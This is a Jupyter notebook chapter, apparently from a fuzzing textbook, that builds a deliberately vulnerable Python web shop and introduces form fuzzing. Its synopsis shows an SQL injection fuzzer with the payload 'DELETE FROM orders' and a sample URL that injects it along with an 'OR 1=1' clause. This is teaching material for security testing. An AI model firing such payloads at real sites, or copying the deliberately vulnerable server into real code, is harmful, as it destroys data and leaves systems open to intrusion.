{
 "cells": [
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "# Testing Web Applications\n",
    "\n",
    "In this chapter, we explore how to generate tests for Graphical User Interfaces (GUIs), notably on Web interfaces.  We set up a (vulnerable) Web server and demonstrate how to systematically explore its behavior – first with handwritten grammars, then with grammars automatically inferred from the user interface.  We also show how to conduct systematic attacks on these servers, notably with code and SQL injection."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 1,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.196618Z",
     "iopub.status.busy": "2025-01-16T10:12:24.196521Z",
     "iopub.status.idle": "2025-01-16T10:12:24.267608Z",
     "shell.execute_reply": "2025-01-16T10:12:24.267345Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "        <iframe\n",
       "            width=\"640\"\n",
       "            height=\"360\"\n",
       "            src=\"https://www.youtube-nocookie.com/embed/cgtpQ2KLZC8\"\n",
       "            frameborder=\"0\"\n",
       "            allowfullscreen\n",
       "            \n",
       "        ></iframe>\n",
       "        "
      ],
      "text/plain": [
       "<IPython.lib.display.IFrame at 0x11a414350>"
      ]
     },
     "execution_count": 1,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "from bookutils import YouTubeVideo\n",
    "YouTubeVideo('cgtpQ2KLZC8')"
   ]
  },
  {
   "cell_type": "raw",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "source": [
    "**Prerequisites**\n",
    "\n",
    "* The techniques in this chapter make use of [grammars for fuzzing](Grammars.ipynb).\n",
    "* Basic knowledge of HTML and HTTP is required.\n",
    "* Knowledge of SQL databases is helpful."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "source": [
    "## Synopsis\n",
    "<!-- Automatically generated. Do not edit. -->\n",
    "\n",
    "To [use the code provided in this chapter](Importing.ipynb), write\n",
    "\n",
    "```python\n",
    ">>> from fuzzingbook.WebFuzzer import <identifier>\n",
    "```\n",
    "\n",
    "and then make use of the following features.\n",
    "\n",
    "\n",
    "This chapter provides a simple (and vulnerable) Web server and two experimental fuzzers that are applied to it.\n",
    "\n",
    "### Fuzzing Web Forms\n",
    "\n",
    "`WebFormFuzzer` demonstrates how to interact with a Web form.  Given a URL with a Web form, it automatically extracts a grammar that produces a URL; this URL contains values for all form elements.  Support is limited to GET forms and a subset of HTML form elements.\n",
    "\n",
    "Here's the grammar extracted for our vulnerable Web server:\n",
    "\n",
    "```python\n",
    ">>> web_form_fuzzer = WebFormFuzzer(httpd_url)\n",
    ">>> web_form_fuzzer.grammar['<start>']\n",
    "['<action>?<query>']\n",
    ">>> web_form_fuzzer.grammar['<action>']\n",
    "['/order']\n",
    ">>> web_form_fuzzer.grammar['<query>']\n",
    "['<item>&<name>&<email-1>&<city>&<zip>&<terms>&<submit-1>']\n",
    "```\n",
    "Using it for fuzzing yields a path with all form values filled; accessing this path acts like filling out and submitting the form.\n",
    "\n",
    "```python\n",
    ">>> web_form_fuzzer.fuzz()\n",
    "'/order?item=lockset&name=%43+&email=+c%40_+c&city=%37b_4&zip=5&terms=on&submit='\n",
    "```\n",
    "Repeated calls to `WebFormFuzzer.fuzz()` invoke the form again and again, each time with different (fuzzed) values.\n",
    "\n",
    "Internally, `WebFormFuzzer` builds on a helper class named `HTMLGrammarMiner`; you can extend its functionality to include more features.\n",
    "\n",
    "### SQL Injection Attacks\n",
    "\n",
    "`SQLInjectionFuzzer` is an experimental extension of `WebFormFuzzer` whose constructor takes an additional _payload_ – an SQL command to be injected and executed on the server.  Otherwise, it is used like `WebFormFuzzer`:\n",
    "\n",
    "```python\n",
    ">>> sql_fuzzer = SQLInjectionFuzzer(httpd_url, \"DELETE FROM orders\")\n",
    ">>> sql_fuzzer.fuzz()\n",
    "\"/order?item=lockset&name=+&email=0%404&city=+'+)%3b+DELETE+FROM+orders%3b+--&zip='+OR+1%3d1--'&terms=on&submit=\"\n",
    "```\n",
    "As you can see, the path to be retrieved contains the payload encoded into one of the form field values.\n",
    "\n",
    "Internally, `SQLInjectionFuzzer` builds on a helper class named `SQLInjectionGrammarMiner`; you can extend its functionality to include more features.\n",
    "\n",
    "`SQLInjectionFuzzer` is a proof-of-concept on how to build a malicious fuzzer; you should study and extend its code to make actual use of it.\n",
    "\n",
    "![](PICS/WebFuzzer-synopsis-1.svg)\n",
    "\n"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "tags": [],
    "toc-hr-collapsed": false
   },
   "source": [
    "## A Web User Interface\n",
    "\n",
    "Let us start with a simple example.  We want to set up a _Web server_ that allows readers of this book to buy fuzzingbook-branded fan articles (\"swag\").  In reality, we would make use of an existing Web shop (or an appropriate framework) for this purpose.  For the purpose of this book, we _write our own Web server_, building on the HTTP server facilities provided by the Python library."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Excursion: Implementing a Web Server"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "All of our Web server is defined in a `HTTPRequestHandler`, which, as the name suggests, handles arbitrary Web page requests."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 2,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.289229Z",
     "iopub.status.busy": "2025-01-16T10:12:24.289060Z",
     "iopub.status.idle": "2025-01-16T10:12:24.290954Z",
     "shell.execute_reply": "2025-01-16T10:12:24.290679Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from http.server import HTTPServer, BaseHTTPRequestHandler\n",
    "from http.server import HTTPStatus  # type: ignore"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 3,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.292571Z",
     "iopub.status.busy": "2025-01-16T10:12:24.292464Z",
     "iopub.status.idle": "2025-01-16T10:12:24.294144Z",
     "shell.execute_reply": "2025-01-16T10:12:24.293899Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):\n",
    "    \"\"\"A simple HTTP server\"\"\"\n",
    "    pass"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Taking Orders\n",
    "\n",
    "For our Web server, we need a number of Web pages:\n",
    "* We want one page where customers can place an order.\n",
    "* We want one page where they see their order confirmed.  \n",
    "* Additionally, we need pages display error messages such as \"Page Not Found\"."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We start with the order form.  The dictionary `FUZZINGBOOK_SWAG` holds the items that customers can order, together with long descriptions:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 4,
   "metadata": {
    "button": false,
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.295787Z",
     "iopub.status.busy": "2025-01-16T10:12:24.295671Z",
     "iopub.status.idle": "2025-01-16T10:12:24.297934Z",
     "shell.execute_reply": "2025-01-16T10:12:24.297655Z"
    },
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import bookutils.setup"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 5,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.299500Z",
     "iopub.status.busy": "2025-01-16T10:12:24.299386Z",
     "iopub.status.idle": "2025-01-16T10:12:24.301009Z",
     "shell.execute_reply": "2025-01-16T10:12:24.300734Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from typing import NoReturn, Tuple, Dict, List, Optional, Union"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 6,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.302496Z",
     "iopub.status.busy": "2025-01-16T10:12:24.302387Z",
     "iopub.status.idle": "2025-01-16T10:12:24.304222Z",
     "shell.execute_reply": "2025-01-16T10:12:24.303953Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "FUZZINGBOOK_SWAG = {\n",
    "    \"tshirt\": \"One FuzzingBook T-Shirt\",\n",
    "    \"drill\": \"One FuzzingBook Rotary Hammer\",\n",
    "    \"lockset\": \"One FuzzingBook Lock Set\"\n",
    "}"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "This is the HTML code for the order form.  The menu for selecting the swag to be ordered is created dynamically from `FUZZINGBOOK_SWAG`.  We omit plenty of details such as precise shipping address, payment, shopping cart, and more."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 7,
   "metadata": {
    "button": false,
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.305923Z",
     "iopub.status.busy": "2025-01-16T10:12:24.305804Z",
     "iopub.status.idle": "2025-01-16T10:12:24.307857Z",
     "shell.execute_reply": "2025-01-16T10:12:24.307613Z"
    },
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "HTML_ORDER_FORM = \"\"\"\n",
    "<html><body>\n",
    "<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
    "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n",
    "  <p>\n",
    "  Yes! Please send me at your earliest convenience\n",
    "  <select name=\"item\">\n",
    "  \"\"\"\n",
    "# (We don't use h2, h3, etc. here\n",
    "# as they interfere with the notebook table of contents)\n",
    "\n",
    "\n",
    "for item in FUZZINGBOOK_SWAG:\n",
    "    HTML_ORDER_FORM += \\\n",
    "        '<option value=\"{item}\">{name}</option>\\n'.format(item=item,\n",
    "            name=FUZZINGBOOK_SWAG[item])\n",
    "\n",
    "HTML_ORDER_FORM += \"\"\"\n",
    "  </select>\n",
    "  <br>\n",
    "  <table>\n",
    "  <tr><td>\n",
    "  <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n",
    "  </td><td>\n",
    "  <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n",
    "  </td></tr>\n",
    "  <tr><td>\n",
    "  <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n",
    "  </td><td>\n",
    "  <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n",
    "  </tr></tr>\n",
    "  </table>\n",
    "  <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n",
    "  the <a href=\"/terms\">terms and conditions</a></label>.<br>\n",
    "  <input type=\"submit\" name=\"submit\" value=\"Place order\">\n",
    "</p>\n",
    "</form>\n",
    "</body></html>\n",
    "\"\"\""
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "This is what the order form looks like:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 8,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.309373Z",
     "iopub.status.busy": "2025-01-16T10:12:24.309270Z",
     "iopub.status.idle": "2025-01-16T10:12:24.310849Z",
     "shell.execute_reply": "2025-01-16T10:12:24.310621Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from IPython.display import display"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 9,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.312297Z",
     "iopub.status.busy": "2025-01-16T10:12:24.312208Z",
     "iopub.status.idle": "2025-01-16T10:12:24.313942Z",
     "shell.execute_reply": "2025-01-16T10:12:24.313709Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "from bookutils import HTML"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 10,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.315448Z",
     "iopub.status.busy": "2025-01-16T10:12:24.315338Z",
     "iopub.status.idle": "2025-01-16T10:12:24.317561Z",
     "shell.execute_reply": "2025-01-16T10:12:24.317295Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<form action=\"/order\" style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Swag Order Form</strong>\n",
       "  <p>\n",
       "  Yes! Please send me at your earliest convenience\n",
       "  <select name=\"item\">\n",
       "  <option value=\"tshirt\">One FuzzingBook T-Shirt</option>\n",
       "<option value=\"drill\">One FuzzingBook Rotary Hammer</option>\n",
       "<option value=\"lockset\">One FuzzingBook Lock Set</option>\n",
       "\n",
       "  </select>\n",
       "  <br>\n",
       "  <table>\n",
       "  <tr><td>\n",
       "  <label for=\"name\">Name: </label><input type=\"text\" name=\"name\">\n",
       "  </td><td>\n",
       "  <label for=\"email\">Email: </label><input type=\"email\" name=\"email\"><br>\n",
       "  </td></tr>\n",
       "  <tr><td>\n",
       "  <label for=\"city\">City: </label><input type=\"text\" name=\"city\">\n",
       "  </td><td>\n",
       "  <label for=\"zip\">ZIP Code: </label><input type=\"number\" name=\"zip\">\n",
       "  </tr></tr>\n",
       "  </table>\n",
       "  <input type=\"checkbox\" name=\"terms\"><label for=\"terms\">I have read\n",
       "  the <a href=\"/terms\">terms and conditions</a></label>.<br>\n",
       "  <input type=\"submit\" name=\"submit\" value=\"Place order\">\n",
       "</p>\n",
       "</form>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 10,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(HTML_ORDER_FORM)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "This form is not yet functional, as there is no server behind it; pressing \"place order\" will lead you to a nonexistent page."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    },
    "toc-hr-collapsed": false
   },
   "source": [
    "#### Order Confirmation\n",
    "\n",
    "Once we have gotten an order, we show a confirmation page, which is instantiated with the customer information submitted before.  Here is the HTML and the rendering:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 11,
   "metadata": {
    "button": false,
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.319079Z",
     "iopub.status.busy": "2025-01-16T10:12:24.318979Z",
     "iopub.status.idle": "2025-01-16T10:12:24.320759Z",
     "shell.execute_reply": "2025-01-16T10:12:24.320497Z"
    },
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "HTML_ORDER_RECEIVED = \"\"\"\n",
    "<html><body>\n",
    "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
    "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
    "  <p id=\"confirmation\">\n",
    "  We will send <strong>{item_name}</strong> to {name} in {city}, {zip}<br>\n",
    "  A confirmation mail will be sent to {email}.\n",
    "  </p>\n",
    "  <p>\n",
    "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
    "  </p>\n",
    "</div>\n",
    "</body></html>\n",
    "\"\"\""
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 12,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.322245Z",
     "iopub.status.busy": "2025-01-16T10:12:24.322131Z",
     "iopub.status.idle": "2025-01-16T10:12:24.324500Z",
     "shell.execute_reply": "2025-01-16T10:12:24.324234Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Thank you for your Fuzzingbook Order!</strong>\n",
       "  <p id=\"confirmation\">\n",
       "  We will send <strong>One FuzzingBook Rotary Hammer</strong> to Jane Doe in Seattle, 98104<br>\n",
       "  A confirmation mail will be sent to doe@example.com.\n",
       "  </p>\n",
       "  <p>\n",
       "  Want more swag?  Use our <a href=\"/\">order form</a>!\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 12,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(HTML_ORDER_RECEIVED.format(item_name=\"One FuzzingBook Rotary Hammer\",\n",
    "                                name=\"Jane Doe\",\n",
    "                                email=\"doe@example.com\",\n",
    "                                city=\"Seattle\",\n",
    "                                zip=\"98104\"))"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Terms and Conditions\n",
    "\n",
    "A website can only be complete if it has the necessary legalese.  This page shows some terms and conditions."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 13,
   "metadata": {
    "button": false,
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.326398Z",
     "iopub.status.busy": "2025-01-16T10:12:24.326294Z",
     "iopub.status.idle": "2025-01-16T10:12:24.327826Z",
     "shell.execute_reply": "2025-01-16T10:12:24.327589Z"
    },
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "HTML_TERMS_AND_CONDITIONS = \"\"\"\n",
    "<html><body>\n",
    "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
    "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Terms and Conditions</strong>\n",
    "  <p>\n",
    "  The content of this project is licensed under the\n",
    "  <a href=\"https://creativecommons.org/licenses/by-nc-sa/4.0/\">Creative Commons\n",
    "  Attribution-NonCommercial-ShareAlike 4.0 International License.</a>\n",
    "  </p>\n",
    "  <p>\n",
    "  To place an order, use our <a href=\"/\">order form</a>.\n",
    "  </p>\n",
    "</div>\n",
    "</body></html>\n",
    "\"\"\""
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 14,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.329237Z",
     "iopub.status.busy": "2025-01-16T10:12:24.329157Z",
     "iopub.status.idle": "2025-01-16T10:12:24.331256Z",
     "shell.execute_reply": "2025-01-16T10:12:24.331040Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Fuzzingbook Terms and Conditions</strong>\n",
       "  <p>\n",
       "  The content of this project is licensed under the\n",
       "  <a href=\"https://creativecommons.org/licenses/by-nc-sa/4.0/\">Creative Commons\n",
       "  Attribution-NonCommercial-ShareAlike 4.0 International License.</a>\n",
       "  </p>\n",
       "  <p>\n",
       "  To place an order, use our <a href=\"/\">order form</a>.\n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 14,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(HTML_TERMS_AND_CONDITIONS)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Storing Orders"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To store orders, we make use of a *database*, stored in the file `orders.db`."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 15,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.332759Z",
     "iopub.status.busy": "2025-01-16T10:12:24.332681Z",
     "iopub.status.idle": "2025-01-16T10:12:24.334332Z",
     "shell.execute_reply": "2025-01-16T10:12:24.334109Z"
    },
    "slideshow": {
     "slide_type": "skip"
    }
   },
   "outputs": [],
   "source": [
    "import sqlite3\n",
    "import os"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 16,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.335785Z",
     "iopub.status.busy": "2025-01-16T10:12:24.335704Z",
     "iopub.status.idle": "2025-01-16T10:12:24.337494Z",
     "shell.execute_reply": "2025-01-16T10:12:24.337249Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "ORDERS_DB = \"orders.db\""
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "To interact with the database, we use *SQL commands*.  The following commands create a table with five text columns for item, name, email, city, and zip – the exact same fields we also use in our HTML form."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 17,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.339055Z",
     "iopub.status.busy": "2025-01-16T10:12:24.338973Z",
     "iopub.status.idle": "2025-01-16T10:12:24.341073Z",
     "shell.execute_reply": "2025-01-16T10:12:24.340829Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "def init_db():\n",
    "    if os.path.exists(ORDERS_DB):\n",
    "        os.remove(ORDERS_DB)\n",
    "\n",
    "    db_connection = sqlite3.connect(ORDERS_DB)\n",
    "    db_connection.execute(\"DROP TABLE IF EXISTS orders\")\n",
    "    db_connection.execute(\"CREATE TABLE orders \"\n",
    "                          \"(item text, name text, email text, \"\n",
    "                          \"city text, zip text)\")\n",
    "    db_connection.commit()\n",
    "\n",
    "    return db_connection"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 18,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.342546Z",
     "iopub.status.busy": "2025-01-16T10:12:24.342456Z",
     "iopub.status.idle": "2025-01-16T10:12:24.346256Z",
     "shell.execute_reply": "2025-01-16T10:12:24.346017Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "db = init_db()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "At this point, the database is still empty:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 19,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.347859Z",
     "iopub.status.busy": "2025-01-16T10:12:24.347757Z",
     "iopub.status.idle": "2025-01-16T10:12:24.349883Z",
     "shell.execute_reply": "2025-01-16T10:12:24.349654Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can add entries using the SQL `INSERT` command:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 20,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.351407Z",
     "iopub.status.busy": "2025-01-16T10:12:24.351320Z",
     "iopub.status.idle": "2025-01-16T10:12:24.353701Z",
     "shell.execute_reply": "2025-01-16T10:12:24.353465Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "db.execute(\"INSERT INTO orders \" +\n",
    "           \"VALUES ('lockset', 'Walter White', \"\n",
    "           \"'white@jpwynne.edu', 'Albuquerque', '87101')\")\n",
    "db.commit()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "These values are now in the database:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 21,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.355274Z",
     "iopub.status.busy": "2025-01-16T10:12:24.355165Z",
     "iopub.status.idle": "2025-01-16T10:12:24.357167Z",
     "shell.execute_reply": "2025-01-16T10:12:24.356893Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[('lockset', 'Walter White', 'white@jpwynne.edu', 'Albuquerque', '87101')]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We can also delete entries from the table again (say, after completion of the order):"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 22,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.358760Z",
     "iopub.status.busy": "2025-01-16T10:12:24.358645Z",
     "iopub.status.idle": "2025-01-16T10:12:24.361257Z",
     "shell.execute_reply": "2025-01-16T10:12:24.361002Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "db.execute(\"DELETE FROM orders WHERE name = 'Walter White'\")\n",
    "db.commit()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 23,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.362826Z",
     "iopub.status.busy": "2025-01-16T10:12:24.362718Z",
     "iopub.status.idle": "2025-01-16T10:12:24.364673Z",
     "shell.execute_reply": "2025-01-16T10:12:24.364404Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "[]\n"
     ]
    }
   ],
   "source": [
    "print(db.execute(\"SELECT * FROM orders\").fetchall())"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Handling HTTP Requests\n",
    "\n",
    "We have an order form and a database; now we need a Web server which brings it all together.  The Python `http.server` module provides everything we need to build a simple HTTP server.  A `HTTPRequestHandler` is an object that takes and processes HTTP requests – in particular, `GET` requests for retrieving Web pages."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We implement the `do_GET()` method that, based on the given path, branches off to serve the requested Web pages.  Requesting the path `/` produces the order form; a path beginning with `/order` sends an order to be processed.  All other requests end in a `Page Not Found` message."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 24,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.366500Z",
     "iopub.status.busy": "2025-01-16T10:12:24.366379Z",
     "iopub.status.idle": "2025-01-16T10:12:24.368486Z",
     "shell.execute_reply": "2025-01-16T10:12:24.368235Z"
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def do_GET(self):\n",
    "        try:\n",
    "            # print(\"GET \" + self.path)\n",
    "            if self.path == \"/\":\n",
    "                self.send_order_form()\n",
    "            elif self.path.startswith(\"/order\"):\n",
    "                self.handle_order()\n",
    "            elif self.path.startswith(\"/terms\"):\n",
    "                self.send_terms_and_conditions()\n",
    "            else:\n",
    "                self.not_found()\n",
    "        except Exception:\n",
    "            self.internal_server_error()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "##### Order Form\n",
    "\n",
    "Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 25,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.369926Z",
     "iopub.status.busy": "2025-01-16T10:12:24.369834Z",
     "iopub.status.idle": "2025-01-16T10:12:24.371615Z",
     "shell.execute_reply": "2025-01-16T10:12:24.371401Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def send_order_form(self):\n",
    "        self.send_response(HTTPStatus.OK, \"Place your order\")\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "        self.wfile.write(HTML_ORDER_FORM.encode(\"utf8\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "Likewise, we can send out the terms and conditions:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 26,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:24.372954Z",
